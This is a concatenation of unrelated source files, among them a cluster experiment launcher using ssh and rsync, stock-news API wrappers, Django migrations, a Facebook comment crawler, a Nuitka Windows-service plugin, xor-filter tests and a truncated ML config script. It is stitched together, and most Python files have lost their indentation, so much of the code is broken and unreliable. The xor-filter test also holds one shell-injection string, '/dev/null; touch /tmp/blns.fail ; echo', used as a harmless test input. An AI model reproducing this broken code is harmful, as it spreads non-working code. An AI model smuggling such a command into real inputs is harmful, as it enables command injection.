os.system('rsync -av --exclude ~/PycharmProjects/wnopt_cavs3/exprBatchScripts/rsync-exclude-list.txt '
'~/PycharmProjects/wnopt_cavs3 hmedal@shadow-login:/work/hmedal/code/')
os.system('ssh hmedal@shadow-login chmod a+x /work/hmedal/code/wnopt_cavs3/exprBatchScripts/*.sh')
result = subprocess.check_output('ssh hmedal@shadow-login "cd /work/hmedal/code/wnopt_cavs3/exprBatchScripts; '
'./run_experiments_for_Test.sh"', shell = True) # note to self: output appears in exprBatchScripts
print "result ", result
with open('../log/jobs_scheduled.log', 'a') as f:
ts = time.time()
f.write(datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') + '\n')
f.write(result + '\n') # python will convert \n to os.linesep
f.close() # you can omit in most cases as the destructor will call it
def run_experiments_for_RunTime_Table(runTheExperiments = False):
rangesOfParametersToVary = {'datasetName': ['grid-7x7',
'berkeley', 'grid-8x8', 'grid-9x9'], 'numChannels' : [1,2], 'jamBudget' : [1,3]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'RunTime',
modelsAndAlgs=modelsAndAlgorithmNames_global,
runTheExperiments = runTheExperiments)
if runTheExperiments:
os.system('ssh hmedal@shadow-login "cd /work/hmedal/code/wnopt_cavs/exprBatchScripts; '
'./run_experiments_for_RunTime.sh"')
def run_experiments_for_HeatMap_Figure(runTheExperiments = False):
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numChannels': [1, 2], 'numJammers': [1, 3]}
paramsDictsForExperiments = createParamsDictsForExprmnts(baseParamsDict_global, rangesOfParametersToVary)
exprBatch = experiments.OptimizationExperimentBatch(computationalResource_global,
'../exprBatchScripts/run_experiments_for_HeatMap_Figure.sh')
for paramsDict in paramsDictsForExperiments:
for infModelName in ['none', 'semi-additive', 'capture', 'protocol', 'interferenceRangeA',
'interferenceRangeB']:
paramsDict['interferenceApproximateModel'] = infModelName
paramsDict['interferenceTrueModel'] = 'additive'
scriptCall = 'python ' + '../src/models/relerror.py'
exprBatch.addOptimizationExperiment(experiments.OptimizationExperiment(scriptCall,
computationalResource_global, outputtable_global, 'HeatMap', parametersDictionary=paramsDict))
def run_experiments_for_NumNodes_Table():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley', 'grid-8x8', 'grid-9x9']}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumNodes')
def run_experiments_for_NumChannels_Table():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numChannels' : [1,2,3]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumChannels')
def run_experiments_for_NumJammerLocations_Table_2D():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numJammerLocations': [9, 16, 25]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumJammerLocations_2D')
def run_experiments_for_NumJammerLocations_Table_3D():
rangesOfParametersToVary = {'dataset': ['grid_5x5x5', 'berkeley_3d'], 'numJammerLocations': [27, 64, 125]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumJammerLocations_3D')
def run_experiments_for_NumJammerLocations_Table():
run_experiments_for_NumJammerLocations_Table_2D()
run_experiments_for_NumJammerLocations_Table_3D()
def run_experiments_for_NumJammers_Table():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numJammers': [1,2,3,4,5]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumJammers')
if __name__ == "__main__":
setUpDB = False
setUp()
if setUpDB:
setUpDatabase()
run_experiments_for_RunTime_Table()
run_experiments_for_HeatMap_Figure()
run_experiments_for_NumNodes_Table()
run_experiments_for_NumChannels_Table()
run_experiments_for_NumJammerLocations_Table()
run_experiments_for_NumJammers_Table()
|
# -*- coding: utf-8 -*-
import pandas as pd
from functools import wraps
from ..common import _getJson, _raiseIfNotStr, _reindex, _toDatetime
def news(symbol, count=10, token='', version='', filter=''):
'''News about company
https://iexcloud.io/docs/api/#news
Continuous
Args:
symbol (str): Ticker to request
count (int): limit number of results
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
Returns:
        dict or DataFrame: result
'''
_raiseIfNotStr(symbol)
return _getJson('stock/' + symbol + '/news/last/' + str(count), token, version, filter)
def _newsToDF(n):
'''internal'''
df = pd.DataFrame(n)
_toDatetime(df, cols=[], tcols=['datetime'])
_reindex(df, 'datetime')
return df
@wraps(news)
def newsDF(symbol, count=10, token='', version='', filter=''):
n = news(symbol, count, token, version, filter)
df = _newsToDF(n)
return df
def marketNews(count=10, token='', version='', filter=''):
'''News about market
https://iexcloud.io/docs/api/#news
Continuous
Args:
count (int): limit number of results
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
Returns:
        dict or DataFrame: result
'''
return _getJson('stock/market/news/last/' + str(count), token, version, filter)
@wraps(marketNews)
def marketNewsDF(count=10, token='', version='', filter=''):
df = pd.DataFrame(marketNews(count, token, version, filter))
_toDatetime(df)
_reindex(df, 'datetime')
return df
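# Minimal usage sketch (assumes a valid IEX Cloud token; 'YOUR_TOKEN' is a placeholder):
#   latest = newsDF('AAPL', count=5, token='YOUR_TOKEN')
#   market = marketNewsDF(count=5, token='YOUR_TOKEN')
# Both return DataFrames reindexed on the 'datetime' column of each news item.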
|
# coding: utf-8
from __future__ import annotations
import re # noqa: F401
from datetime import date, datetime # noqa: F401
from typing import Any, Dict, List, Optional # noqa: F401
from pydantic import AnyUrl, BaseModel, EmailStr, validator # noqa: F401
class CreateMachine(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
CreateMachine - a model defined in OpenAPI
unit_installed_at: The unit_installed_at of this CreateMachine [Optional].
oem_name: The oem_name of this CreateMachine.
model: The model of this CreateMachine [Optional].
make: The make of this CreateMachine [Optional].
equipment_id: The equipment_id of this CreateMachine [Optional].
serial_number: The serial_number of this CreateMachine.
pin: The pin of this CreateMachine [Optional].
"""
unit_installed_at: Optional[datetime] = None
oem_name: str
model: Optional[str] = None
make: Optional[str] = None
equipment_id: Optional[str] = None
serial_number: str
pin: Optional[str] = None
CreateMachine.update_forward_refs()
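# Illustrative usage sketch (the field values below are made up for demonstration
# and do not come from the generated API definition):
if __name__ == "__main__":
    machine = CreateMachine(
        oem_name="ExampleOEM",      # required
        serial_number="SN-0001",    # required
        model="X100",               # optional
    )
    # Pydantic validates the required fields; optional ones default to None.
    print(machine.json(exclude_none=True))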
|
#!/usr/bin/env python3
def utf8len(s):
"""Returns the UTF-8 encoded byte size of a string. `s` is a string parameter."""
return len(s.encode("utf-8"))
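if __name__ == "__main__":
    # Quick demonstration: ASCII characters take one byte each in UTF-8, while
    # "é" needs two, so the encoded size can exceed len(s).
    print(utf8len("abc"))   # 3
    print(utf8len("café"))  # 5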
|
# Generated by Django 3.0.5 on 2020-04-26 18:22
from django.db import migrations, models
def associate_materials(apps, schema_editor):
LessonPlan = apps.get_model('curriculum', 'LessonPlan')
for lesson_plan in LessonPlan.objects.all():
for material in lesson_plan.material_set.all():
lesson_plan.materials.add(material)
lesson_plan.save()
class Migration(migrations.Migration):
dependencies = [
('curriculum', '0018_auto_20200419_1933'),
]
operations = [
migrations.AddField(
model_name='lessonplan',
name='materials',
field=models.ManyToManyField(blank=True, to='curriculum.Material'),
),
migrations.RunPython(associate_materials),
migrations.RemoveField(
model_name='material',
name='lesson_plan',
),
]
|
from datetime import datetime, timedelta
import re
import time
import mysql.connector
import facebook
import progressbar
import yaml
def main():
with open('config.yml', 'r') as c:
        config = yaml.safe_load(c)
crawler = Crawler(config)
crawler.crawl()
class Crawler:
def __init__(self, config):
self.pages = config["pages"]
self.start_date = config["startDate"]
self.end_date = datetime.today() - timedelta(days=1) # Only crawl comments older than 24h
self.base_timeout = 900 # 15 minutes
self.comment_counter = 0
# Initialize Facebook Graph API
if config["facebook"]["userToken"]:
token = config["facebook"]["userToken"]
else:
token = facebook.GraphAPI().get_app_access_token(config["facebook"]["appId"],
config["facebook"]["appSecret"],
offline=False)
self.graph = facebook.GraphAPI(access_token=token, version='2.10')
# Initialize database
self.cnx = mysql.connector.connect(user=config["database"]["user"],
password=config["database"]["password"],
host=config["database"]["host"],
database=config["database"]["db"])
self.cursor = self.cnx.cursor()
def crawl(self):
"""Crawls all posts and comments that are specified in the configuration"""
try:
self.crawl_pages()
self.crawl_posts()
self.crawl_comments()
except Exception as exception:
self.handle_request_limit(exception)
def handle_request_limit(self, exception, timeout_factor=1):
if type(exception) == facebook.GraphAPIError and ('(#17) User request limit reached' in exception.message or
'An unexpected error has occurred.' in exception.message):
timeout = self.base_timeout * timeout_factor
print('\nUser request limit reached, waiting for {} minutes until {}'.format(timeout // 60,
(datetime.now() + timedelta(seconds=timeout)).strftime("%H:%M:%S")))
time.sleep(timeout)
try:
self.graph.get_object('me')
except Exception as exception:
self.handle_request_limit(exception, timeout_factor * 2)
self.crawl_comments()
else:
raise exception
def crawl_pages(self):
for page_path in self.pages:
self.cursor.execute('SELECT * FROM page WHERE path=%s', (page_path,))
if len(self.cursor.fetchall()) == 0:
page = self.graph.get_object(page_path)
print('Inserting "www.facebook.com/{}": "{}"'.format(page_path, page['name']))
self.cursor.execute('INSERT INTO page (fb_id, path, name) VALUES (%s,%s,%s)',
(page['id'], page_path, page['name']))
self.cnx.commit()
def crawl_posts(self):
self.cursor.execute('SELECT name, id, fb_id FROM page')
for (page_name, page_id, page_fb_id) in self.cursor.fetchall():
# Compute start and end date
self.cursor.execute('SELECT max(created_time) FROM post WHERE page=%s', (page_id,))
latest_date = self.cursor.fetchone()[0]
if latest_date is None:
latest_date = self.start_date
start_date = time.mktime(latest_date.timetuple())
end_date = time.mktime(self.end_date.timetuple())
# Download posts
print('Crawling "{}" posts ...'.format(page_name), end='')
posts = self.graph.get_all_connections(page_fb_id, 'posts', order='chronological', since=start_date,
until=end_date, limit=100)
counter = 0
for post in posts:
values = (page_id, post['id'], post['created_time'], post.get('story'), post.get('message'))
success = self._insert_if_possible('INSERT INTO post (page, fb_id, created_time, story, message) '
'VALUES (%s,%s,%s,%s,%s)', values)
if success:
counter = counter + 1
print(' {} new posts crawled'.format(counter))
def crawl_comments(self):
# Configure the progress bar
self.cursor.execute('SELECT count(id) FROM post')
posts_count = self.cursor.fetchone()[0]
if not hasattr(self, 'initial_posts_count'):
self.initial_posts_count = posts_count
bar = progressbar.ProgressBar()
bar.update(self.initial_posts_count-posts_count)
self.cursor.execute('SELECT id, page, fb_id, created_time FROM post WHERE do_not_crawl=0 ORDER BY created_time')
fields = 'id,message,message_tags,from,created_time,comment_count,like_count'
for (post_id, page_id, post_fb_id, post_created_time) in bar(self.cursor.fetchall()):
self.cursor.execute('SELECT max(created_time) FROM comment WHERE post=%s', (post_id,))
latest_date = self.cursor.fetchone()[0]
if latest_date is None:
comments = self.graph.get_all_connections(post_fb_id, 'comments', fields=fields, order='chronological',
limit=100)
else:
start_date = time.mktime(latest_date.timetuple())
comments = self.graph.get_all_connections(post_fb_id, 'comments', fields=fields, order='chronological',
limit=100, since=start_date)
try:
for comment in comments:
success = self._add_comment(comment, post_id, page_id)
if success:
self.comment_counter = self.comment_counter + 1
if success and comment['comment_count'] > 0:
self.cnx.commit()
comment_id = self.cursor.lastrowid
subcomments = self.graph.get_all_connections(comment['id'], 'comments', fields=fields,
order='chronological', limit=500)
for subcomment in subcomments:
success = self._add_comment(subcomment, post_id, page_id, comment_id)
if success:
self.comment_counter += 1
self.cnx.commit()
except facebook.GraphAPIError as e:
                # In case the post was deleted before it was crawled and marked
                # as 'do_not_crawl', this error will be thrown. We just mark the
                # post as 'do_not_crawl' and continue.
if 'Unsupported get request. Object with ID \'{}\' does not exist'.format(post_fb_id) in e.message:
self.cursor.execute('UPDATE post SET do_not_crawl=1 WHERE id=%s', (post_id,))
self.cnx.commit()
print('\nSkipping post {} because it was deleted'.format(post_fb_id))
self.crawl_comments()
else:
raise e
# If all comments are crawled and post is older than 1 month, activate 'do_not_crawl' flag
if post_created_time < (datetime.today() - timedelta(days=30)):
self.cursor.execute('UPDATE post SET do_not_crawl=1 WHERE id=%s', (post_id,))
self.cnx.commit()
print('\n{} new comments added'.format(self.comment_counter))
def _add_comment(self, comment, post_id, page_id, parent_comment=None):
"""Adds a comment to the data set
Args:
comment (dict): Comment object from the Graph API
post_id (int): ID of the post
            page_id (int): ID of the page
parent_comment (str): Facebook ID of the parent comment. Only present on subcomments
Returns:
            (bool) True if the comment was added, False otherwise
"""
user_id = self._get_or_create_user(comment['from'])
message = self._clean_message(comment)
if len(message) > 0:
columns = '(user, post, page, fb_id, created_time, message, like_count, comment_count'
values = (user_id, post_id, page_id, comment['id'], comment['created_time'],
message, comment['like_count'], comment['comment_count'])
values_placeholder = '(%s,%s,%s,%s,%s,%s,%s,%s'
if parent_comment is None:
columns = columns + ')'
values_placeholder = values_placeholder + ')'
else:
columns = columns + ',parent_comment)'
values = values + (parent_comment,)
values_placeholder = values_placeholder + ',%s)'
return self._insert_if_possible('INSERT INTO comment {} VALUES {}'.format(columns, values_placeholder),
values)
else:
return False
def _get_or_create_user(self, user):
"""Returns the database id of a user or creates a new record if the user does not exist yet
Args:
user (dict): User object from the Graph API
Returns:
(int) ID of the user in the database
"""
self.cursor.execute('SELECT id FROM user WHERE fb_id=%s', (user['id'],))
user_ids = self.cursor.fetchall()
assert len(user_ids) <= 1, 'Too many users: ' + user_ids
if len(user_ids) == 1:
return user_ids[0][0]
else:
self.cursor.execute('INSERT INTO user (fb_id, name) VALUES (%s,%s)', (user['id'], user['name']))
return self.cursor.lastrowid
def _insert_if_possible(self, query, values):
"""Inserts a post or comment in the database if it's not already there
Args:
query (str): Query to execute
values (tuple): Values to substitute the query
Returns:
            (bool) True if the post/comment was inserted, False otherwise
"""
try:
self.cursor.execute(query, values)
self.cnx.commit()
return True
except mysql.connector.errors.IntegrityError:
self.cnx.rollback()
return False
@staticmethod
def _clean_message(comment):
"""Removes all hyperlinks, tagged users/pages and other dirt from the message
Args:
comment (dict): Comment object from the Graph API
Returns:
(str) Cleaned string. May be empty if the entire comment should be discarded
"""
message = comment['message']
# Remove comments with linked persons (they mostly contain only emojis)
if 'message_tags' in comment:
for tag in comment['message_tags']:
if 'type' in tag and tag['type'] == 'user':
message = message.replace(tag['name'], '')
# Remove links
message = re.sub(r'http\S+', '', message)
return message.strip()
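# Illustrative config.yml layout, inferred from the keys read above (all values
# are placeholders, not real credentials):
#   pages: ["somepage"]
#   startDate: 2017-01-01
#   facebook:
#     userToken: ""          # leave empty to authenticate with appId/appSecret
#     appId: "APP_ID"
#     appSecret: "APP_SECRET"
#   database:
#     user: "crawler"
#     password: "secret"
#     host: "localhost"
#     db: "facebook"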
if __name__ == "__main__":
main()
|
# Copyright 2020, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Standard plug-in to make a binary work as a Windows service.
This produces a binary that has an "install" argument or could be
registered manually as a service.
"""
from nuitka.plugins.PluginBase import NuitkaPluginBase
class NuitkaPluginWindowsService(NuitkaPluginBase):
""" This is to make a binary work as a Windows service.
"""
plugin_name = "windows-service"
def __init__(self, windows_service_name):
self.windows_service_name = windows_service_name
@classmethod
def addPluginCommandLineOptions(cls, group):
group.add_option(
"--windows-service-name",
action="store",
dest="windows_service_name",
default=None,
help="""[REQUIRED] The Windows service name.""",
)
@staticmethod
def getExtraLinkLibraries():
return "advapi32"
@staticmethod
def getPreprocessorSymbols():
return {"_NUITKA_PLUGIN_WINDOWS_SERVICE_ENABLED": "1"}
def getExtraCodeFiles(self):
return {
"WindowsService.c": extra_code
% {"windows_service_name": self.windows_service_name}
}
extra_code = r"""
#include <windows.h>
#include <tchar.h>
#include <strsafe.h>
#define SVCNAME L"%(windows_service_name)s"
#define SVC_ERROR ((DWORD)0xC0020001L)
SERVICE_STATUS gSvcStatus;
SERVICE_STATUS_HANDLE gSvcStatusHandle;
HANDLE ghSvcStopEvent = NULL;
void WINAPI SvcCtrlHandler(DWORD);
void WINAPI SvcMain(DWORD, LPTSTR *);
static void ReportSvcStatus(DWORD, DWORD, DWORD);
static void SvcInit();
static void SvcReportEvent(LPTSTR);
// Purpose:
// Entry point for the process
//
// Parameters:
// None
//
// Return value:
// None
//
void SvcLaunchService() {
// TO_DO: Add any additional services for the process to this table.
SERVICE_TABLE_ENTRYW DispatchTable[] =
{
{ SVCNAME, (LPSERVICE_MAIN_FUNCTIONW)SvcMain },
{ NULL, NULL }
};
// This call returns when the service has stopped.
// The process should simply terminate when the call returns.
if (!StartServiceCtrlDispatcherW(DispatchTable)) {
SvcReportEvent(TEXT("StartServiceCtrlDispatcher"));
}
}
// Install the service binary.
void SvcInstall() {
SC_HANDLE schSCManager;
SC_HANDLE schService;
wchar_t szPath[MAX_PATH];
if( !GetModuleFileNameW(NULL, szPath, MAX_PATH)) {
printf("Cannot install service (%%d)\n", GetLastError());
abort();
}
// Get a handle to the SCM database.
schSCManager = OpenSCManager(
NULL, // local computer
NULL, // ServicesActive database
SC_MANAGER_ALL_ACCESS); // full access rights
if (NULL == schSCManager) {
printf("OpenSCManager failed (%%d)\n", GetLastError());
abort();
}
// Create the service
schService = CreateServiceW(
schSCManager, // SCM database
SVCNAME, // name of service
SVCNAME, // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_OWN_PROCESS, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
szPath, // path to service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL) {
printf("CreateService failed (%%d)\n", GetLastError());
CloseServiceHandle(schSCManager);
abort();
} else {
printf("Service installed successfully\n");
}
CloseServiceHandle(schService);
CloseServiceHandle(schSCManager);
exit(0);
}
//
// Purpose:
// Entry point for the service
//
// Parameters:
// dwArgc - Number of arguments in the lpszArgv array
// lpszArgv - Array of strings. The first string is the name of
// the service and subsequent strings are passed by the process
// that called the StartService function to start the service.
//
// Return value:
// None.
//
void WINAPI SvcMain(DWORD dwArgc, LPTSTR *lpszArgv) {
// Register the handler function for the service
gSvcStatusHandle = RegisterServiceCtrlHandlerW(
SVCNAME,
SvcCtrlHandler
);
if( !gSvcStatusHandle ) {
SvcReportEvent(TEXT("RegisterServiceCtrlHandler"));
return;
}
// These SERVICE_STATUS members remain as set here
gSvcStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
gSvcStatus.dwServiceSpecificExitCode = 0;
// Report initial status to the SCM
ReportSvcStatus(SERVICE_START_PENDING, NO_ERROR, 3000);
// Perform service-specific initialization and work.
SvcInit();
}
extern DWORD WINAPI SvcStartPython(LPVOID lpParam);
static void SvcInit() {
// Pre-create stop event.
ghSvcStopEvent = CreateEvent(
NULL, // default security attributes
TRUE, // manual reset event
FALSE, // not signaled
NULL // no name
);
if (ghSvcStopEvent == NULL) {
ReportSvcStatus(SERVICE_STOPPED, NO_ERROR, 0);
return;
}
// Report running status when initialization is complete.
ReportSvcStatus(SERVICE_RUNNING, NO_ERROR, 0);
HANDLE python_thread = CreateThread(
NULL,
0,
SvcStartPython,
NULL,
0,
NULL
);
// Perform work until service stops.
// Check whether to stop the service.
WaitForSingleObject(ghSvcStopEvent, INFINITE);
ReportSvcStatus(SERVICE_STOPPED, NO_ERROR, 0);
TerminateThread(python_thread, 0);
}
// Purpose:
// Sets the current service status and reports it to the SCM.
//
// Parameters:
// dwCurrentState - The current state (see SERVICE_STATUS)
// dwWin32ExitCode - The system error code
// dwWaitHint - Estimated time for pending operation,
// in milliseconds
//
// Return value:
// None
//
static void ReportSvcStatus(DWORD dwCurrentState, DWORD dwWin32ExitCode, DWORD dwWaitHint) {
static DWORD dwCheckPoint = 1;
// Fill in the SERVICE_STATUS structure.
gSvcStatus.dwCurrentState = dwCurrentState;
gSvcStatus.dwWin32ExitCode = dwWin32ExitCode;
gSvcStatus.dwWaitHint = dwWaitHint;
if (dwCurrentState == SERVICE_START_PENDING) {
gSvcStatus.dwControlsAccepted = 0;
} else {
gSvcStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
}
if ((dwCurrentState == SERVICE_RUNNING) || (dwCurrentState == SERVICE_STOPPED)) {
gSvcStatus.dwCheckPoint = 0;
} else {
gSvcStatus.dwCheckPoint = dwCheckPoint++;
}
// Report the status of the service to the SCM.
SetServiceStatus(gSvcStatusHandle, &gSvcStatus);
}
// Purpose:
// Called by SCM whenever a control code is sent to the service
// using the ControlService function.
//
// Parameters:
// dwCtrl - control code
//
// Return value:
// None
//
void WINAPI SvcCtrlHandler(DWORD dwCtrl) {
// Handle the requested control code.
switch(dwCtrl) {
case SERVICE_CONTROL_STOP:
ReportSvcStatus(SERVICE_STOP_PENDING, NO_ERROR, 0);
// Signal the service to stop.
SetEvent(ghSvcStopEvent);
ReportSvcStatus(gSvcStatus.dwCurrentState, NO_ERROR, 0);
return;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
}
// Purpose:
// Logs messages to the event log
//
// Parameters:
// szFunction - name of function that failed
//
// Return value:
// None
//
// Remarks:
// The service must have an entry in the Application event log.
//
static void SvcReportEvent(LPTSTR szFunction) {
HANDLE hEventSource;
LPCWSTR outputs[2];
wchar_t buffer[80] = L"TODO: Proper reporting";
hEventSource = RegisterEventSourceW(NULL, SVCNAME);
if (NULL != hEventSource) {
// TODO: Change this to work with wchar_t:
// StringCchPrintf(buffer, 80, TEXT("%%s failed with %%d"), szFunction, GetLastError());
outputs[0] = SVCNAME;
outputs[1] = buffer;
ReportEventW(hEventSource, // event log handle
EVENTLOG_ERROR_TYPE, // event type
0, // event category
SVC_ERROR, // event identifier
NULL, // no security identifier
2, // size of lpszStrings array
0, // no binary data
outputs, // array of strings
NULL); // no binary data
DeregisterEventSource(hEventSource);
}
}
"""
|
import wbsv
__version__ = "0.1.5"
|
from luno.clients.sync import LunoSyncClient
from luno.clients.asynchronous import LunoAsyncClient
|
"""generates a shapefile from a list of tile files"""
import argparse
import os
from osgeo import ogr, osr
from hyp3lib.asf_geometry import geotiff2polygon, geometry2shape
def tileList2shape(listFile, shapeFile):
# Set up shapefile attributes
fields = []
field = {}
values = []
field['name'] = 'tile'
field['type'] = ogr.OFTString
field['width'] = 100
fields.append(field)
files = [line.strip() for line in open(listFile)]
for fileName in files:
print('Reading %s ...' % fileName)
polygon = geotiff2polygon(fileName)
tile = os.path.splitext(os.path.basename(fileName))[0]
value = {}
value['tile'] = tile
value['geometry'] = polygon
values.append(value)
spatialRef = osr.SpatialReference()
spatialRef.ImportFromEPSG(4326)
# Write geometry to shapefiles
geometry2shape(fields, values, spatialRef, False, shapeFile)
def main():
"""Main entrypoint"""
parser = argparse.ArgumentParser(
prog=os.path.basename(__file__),
description=__doc__,
)
parser.add_argument('file_list',
help='name of the tiles file list')
parser.add_argument('shape_file',
help='name of the shapefile')
args = parser.parse_args()
if not os.path.exists(args.file_list):
        parser.error(f'Tile list file {args.file_list} does not exist!')
tileList2shape(args.file_list, args.shape_file)
if __name__ == '__main__':
main()
|
from django.apps import AppConfig
class perfilesConfig(AppConfig):
name = 'search'
|
# Generated by Django 3.2.4 on 2021-10-14 18:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_authtoggle_timeout'),
]
operations = [
migrations.AlterField(
model_name='authtoggle',
name='timeout',
field=models.IntegerField(default=1),
),
]
|
from pyxorfilter import Xor16
import random
def test_xor16_int():
xor_filter = Xor16(100)
test_lst = random.sample(range(0, 1000), 100)
xor_filter.populate(test_lst.copy())
for i in test_lst:
assert xor_filter.contains(i) == True
for i in random.sample(range(1000, 3000), 500):
assert xor_filter.contains(i) == False
def test_xor16_int_iterable():
xor_filter = Xor16(100)
xor_filter.populate(range(50))
for i in range(50):
assert xor_filter.contains(i) == True
def test_xor16_strings():
xor_filter = Xor16(10)
test_str = ["ใ", "/dev/null; touch /tmp/blns.fail ; echo", "เค
", "Normal", "122"]
xor_filter.populate(test_str.copy())
for test in test_str:
assert xor_filter.contains(test) == True
test_str2 = ["ๆ", "เค", "12", "delta"]
for i in test_str2:
assert xor_filter.contains(i) == False
def test_xor16_floats():
xor_filter = Xor16(10)
test_floats = [1.23, 9999.88, 323.43, 0.0]
xor_filter.populate(test_floats.copy())
for i in test_floats:
assert xor_filter.contains(i) == True
test_floats2 = [-1.23, 1.0, 0.1, 676.5, 1.234]
for i in test_floats2:
assert xor_filter.contains(i) == False
def test_xor16_all():
xor_filter = Xor16(5)
test_str = ["string", 51, 0.0, 12.3]
xor_filter.populate(test_str.copy())
for i in test_str:
assert xor_filter.contains(i) == True
test_str2 = [12, "เฅช", 0.1]
for i in test_str2:
assert xor_filter.contains(i) == False
|
# -*- coding: utf-8 -*-
"""
Copyright 2022 Mitchell Isaac Parker
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
pdbaa_fasta_file = "pdbaa.fasta"
entry_table_file = "entry.tsv"
coord_table_file = "coord.tsv"
sifts_json_file = "sifts.json"
lig_table_file = "ligand.tsv"
prot_table_file = "protein.tsv"
mut_table_file = "mutation.tsv"
cf_table_file = "cf.tsv"
edia_json_file = "edia.json"
dih_json_file = "dihedral.json"
interf_json_file = "interface.json"
pocket_json_file = "pocket.json"
dih_table_file = "dihedral.tsv"
edia_table_file = "edia.tsv"
dist_table_file = "distance.tsv"
interf_table_file = "interface.tsv"
pocket_table_file = "pocket.tsv"
fit_table_file = "fit.tsv"
pred_table_file = "predict.tsv"
dih_matrix_file = "dihedral.csv"
dist_matrix_file = "distance.csv"
rmsd_matrix_file = "rmsd.csv"
interf_matrix_file = "interface.csv"
pocket_matrix_file = "pocket.csv"
max_norm_file = "max_norm.csv"
mean_norm_file = "mean_norm.csv"
max_flip_file = "max_flip.csv"
mean_flip_file = "mean_flip.csv"
rmsd_json_file = "rmsd.json"
fit_matrix_file = "fit.csv"
pred_matrix_file = "pred.csv"
dih_fit_matrix_file = "dihedral_fit.csv"
dih_pred_matrix_file = "dihedral_pred.csv"
rmsd_fit_matrix_file = "rmsd_fit.csv"
rmsd_pred_matrix_file = "rmsd_pred.csv"
dist_fit_matrix_file = "dist_fit.csv"
dist_pred_matrix_file = "pred_fit.csv"
cluster_table_file = "cluster.tsv"
result_table_file = "result.tsv"
cluster_report_table_file = "cluster_report.tsv"
classify_report_table_file = "classify_report.tsv"
sum_table_file = "summary.tsv"
cutoff_table_file = "cutoff.tsv"
count_table_file = "count.tsv"
plot_img_file = "plot.pdf"
legend_img_file = "legend.pdf"
venn_img_file = "venn.pdf"
pymol_pml_file = "pymol.pml"
stat_table_file = "statistic.tsv"
nom_table_file = "nomenclature.tsv"
|
"""
The script that converts the configuration file (dictionaries) into experiments and runs them
"""
from src.models.methods import string_to_key, select_estimator, read_datasets, cv_choices, css_choices
from sklearn import model_selection, preprocessing
import imblearn
from src.models.cssnormaliser import CSSNormaliser
from sklearn.model_selection import StratifiedKFold
import pandas as pd
from src.models.experiment import Experiment
import src.models.methods as mth
from itertools import product
import os
import warnings
import time
import argparse
import importlib
import pickle
# Parsing the name of the custom config file from the command line
parser = argparse.ArgumentParser(description='The script that converts the configuration file (dictionaries) into '
'experiments and runs them. Any arguments passed through the command line'
' are for custom runs.')
parser.add_argument('--config', metavar='config-file', type=str, nargs=1,default = ["default_config"],
                    help='Name of custom config file without .py extension, e.g. custom_config.'
                         ' If not provided then the default_config.py is used as the '
'configuration. The custom configuration file has to be in the same folder as the '
'config_to_experiment.py file.',required =False)
parser.add_argument('--name', metavar='name', type=str, nargs=1,default = [""],
help='A string to be appended at the start of the filename of the results file produced'
,required =False)
args = parser.parse_args()
args.config = os.path.basename(args.config[0])
args.name = args.name[0]
if args.config[-3:] == ".py":
args.config = args.config[:-3]
print("The package is using ",args.config," as the config file.")
try:
configuration_list = importlib.import_module(args.config).configuration_list
if args.config != "default_config" and args.name == "":
# this will be appended at the start of the results file to indicate that it was produced by a custom configuration
# file
results_prefix = "custom"
else:
results_prefix = args.name
except AttributeError as e:
print("The configuration file provided does not contain a variable named configuration_list which is a list that "
"contains all dictionaries that define the experiments. Take a look in the default_config.py to see how the "
"variable is used.")
raise e
# Storing the date and time to be used for saving the results and avoiding overwriting
day_time_string = time.strftime("%Y-%m-%d-%H%M")
warnings.filterwarnings("ignore", category=UserWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
warnings.filterwarnings("ignore", category=FutureWarning)
dirname = os.path.dirname(__file__)
project_dir = os.path.join(dirname,"..","..")
# def get_data(data_string):
# """
# Reads in either a dictionary or a tuple and tries to open up the datasets.
# The dictionary has the form {"features":features_data_set,"target":target_data_set,
# optional"target_col":column_of_target_variable default is "target", optional"train_test_group":column_of_grouping_variable
# default is "group" if it doesn't exist it is set to target variable}
# The tuple has the name of the features dataset as first element and the name of the target as second.
# default columns are used for target and train_test_group
#
# :param data_string: tuple or dict
# :return:
# (features_name,target_name,target_col,train_test_group_col), features_set,target_set,target,group
